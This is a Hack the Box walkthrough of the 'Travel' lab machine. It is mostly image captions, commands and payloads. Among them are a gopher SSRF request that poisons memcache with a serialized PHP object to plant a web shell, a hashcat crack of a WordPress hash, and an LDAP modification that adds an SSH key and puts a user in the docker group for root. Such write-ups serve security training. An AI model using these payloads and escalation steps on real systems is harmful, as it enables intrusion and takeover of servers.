Hack the Box: Travel

Travel

User

Recon

Main page
Blog subdomain
Awesome RSS
Blog-dev subdomain
Dumping .git repo
Repo content
README.md file

Foothold

Debug comment
Sending payload
Memcache write confirmation
A part of key
Memcache key
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty`
../../uploads/payload.php
Gopherus memcache generation
  • Add a 0 to the address so it looks like 127.00.0.1
  • Encode the path-traversal dots in the URL (replace them with %2E)
  • Replace the Spyd3r string with SimplePie's memcache key name: xct_4e5612ba079c530a6b1f148c0b352241
GET /awesome-rss/?debug=1&custom_feed_url=gopher://127.00.0.1:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%20443%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:20:%22%00TemplateHelper%00file%22%3Bs:28:%22%2E%2E/%2E%2E/%2E%2E/uploads/payload.php%22%3Bs:20:%22%00TemplateHelper%00data%22%3Bs:316:%22%3B%3Chtml%3E%3Cbody%3E%3Cform%20method%3D%22GET%22%20name%3D%22%3C%3Fphp%20echo%20basename%28%24_SERVER%5B%27PHP_SELF%27%5D%29%3B%20%3F%3E%22%3E%3Cinput%20type%3D%22TEXT%22%20name%3D%22cmd%22%20id%3D%22cmd%22%20size%3D%2280%22%3E%3Cinput%20type%3D%22SUBMIT%22%20value%3D%22Execute%22%3E%3C/form%3E%3Cpre%3E%3C%3Fphp%20%20%20%20if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%7Bsystem%28%24_GET%5B%27cmd%27%5D%29%3B%7D%3F%3E%3C/pre%3E%3C/body%3E%3Cscript%3Edocument.getElementById%28%22cmd%22%29.focus%28%29%3B%3C/script%3E%3C/html%3E%22%3B%7D%0d%0a HTTP/1.1
Host: blog.travel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Webshell

User

Wordpress backup
Lynik-admin hash
# hashcat.exe -m400 -a0 hashes.txt rockyou.txt
-- snip --
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser
User flag

Root

.ldaprc
hosts file
LDAP password
# ssh lynik-admin@travel.htb -D 1080
# proxychains4 ldapsearch -x -o ldif-wrap=no -h 172.20.0.10 -b "dc=travel,dc=htb" -D 'cn=lynik-admin,dc=travel,dc=htb' -W
-- snip --
# travel.htb
dn: dc=travel,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: Travel.HTB
dc: travel
-- snip --
# linux, servers, travel.htb
dn: ou=linux,ou=servers,dc=travel,dc=htb
description: Linux Servers
objectClass: organizationalUnit
ou: linux
-- snip --
# jane, users, linux, servers, travel.htb
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: jane
uidNumber: 5005
homeDirectory: /home/jane
givenName: Jane
gidNumber: 5000
sn: Rodriguez
cn: Jane Rodriguez
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash
-- snip --
$ cat /etc/group
root:x:0:
-- snip --
docker:x:117:
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa <public key elided> tellico@htb
-
replace: gidNumber
gidNumber: 117
Access as Jane
List of docker images
Root flag

Tellico Lungrevink
